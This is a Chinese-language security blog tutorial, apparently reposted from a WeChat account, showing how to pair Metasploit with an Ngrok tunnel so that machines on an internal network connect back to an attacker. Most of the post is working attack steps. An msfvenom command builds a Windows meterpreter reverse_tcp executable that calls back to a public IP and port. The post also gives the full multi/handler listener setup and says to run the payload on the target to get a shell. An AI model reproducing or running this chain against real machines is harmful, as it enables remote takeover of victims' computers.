当被攻击目标在内网无法与本地直接建立会话时,需要公网地址监听并转发会话。此时解决办法有:
1.msf安装在公网上;
2.使用公网进行转发 。
Ngrok 是一个反向代理,通过在公共的端口和本地运行的 Web 服务器之间建立一个安全的通道。可捕获和分析所有通道上的流量,便于后期分析和重放。它是内网穿透的跳板。
一、搭建ngrock服务器
官网:https://ngrok.cc/
在官网注册账号,这里实验使用免费版。注意:免费版可能无法加载会话,为我这种穷b准备的。
设置监听端口:
复制隧道id。选择版本进行客户端下载:
下载完成。在kali里直接运行:
./sunny clientid b86088bd6xxxxxx
后面这一串是购买时ngrock附送的隧道id;ngrock客户端与服务器建立连接,不要关闭这个窗口。
msf生成payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=64.69.43.237 lport=10147 -f exe >a.exe
这里监听的lhost和lport需要设置成购买ngrock时附送的域名和端口,为了防止dns解析出现问题,在生成payload时使用IP而不是使用域名。
二、msf 建立监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 10147
run
ps: 建立监听时设置的IP是127.0.0.1,因为ngrock是与127.0.0.1建立的会话
三、靶机运行payload建立会话
将刚刚生成的payload a.exe放到靶机里面并运行,成功建立会话:
msf里面成功返回会话即可输入shell创建连接:
实验成功
ps:由于实验是白嫖的免费版ngrock,所有很卡很慢很不稳定还不一定能够成功返回会话。这里靶机运行了十多次才返回会话。所以还是收费版本比较香
一如既往的学习,一如既往的整理,一如即往的分享。感谢支持
“如侵权请私聊公众号删文”
扫描关注LemonSec
觉得不错点个“赞”、“在看”哦
本文始发于微信公众号(LemonSec):MSF配合Ngrock穿透内网
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论